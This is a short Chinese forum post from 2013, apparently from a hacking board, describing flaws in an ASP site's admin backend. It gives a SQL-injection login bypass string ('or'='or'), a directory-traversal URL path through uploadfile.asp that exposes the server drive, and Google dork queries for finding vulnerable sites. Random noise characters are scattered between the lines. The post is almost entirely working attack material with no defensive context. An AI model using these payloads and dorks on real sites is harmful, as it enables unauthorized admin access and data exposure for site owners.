后台万能密码 'or'='or'
, z* w; X1 d9 x, l2 m1 \$ p5 I+ T6 I' {5 h0 i6 ]% V
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
; F1 Q) Q8 s* nadmin/uploadfile.asp?currentFolder=/upfiles/../
0 m+ A: j2 v$ H& e: ~* f0 B) P; t1 d
漏洞证明:
* w: h' M: S2 s0 T& K$ @, T2 W0 N8 U p* [) g
谷歌:inurl:type.asp?id=1 新闻中心' v' y9 B/ B6 f: [( c* Y
或者 :inurl:download_ok.asp?
+ V. U# ~, Y+ r4 W# ?+ f
/ \/ u) e1 i0 M$ P/ Z u; `1 N |
发表于 2013-3-14 20:17:32
收藏
支持
反对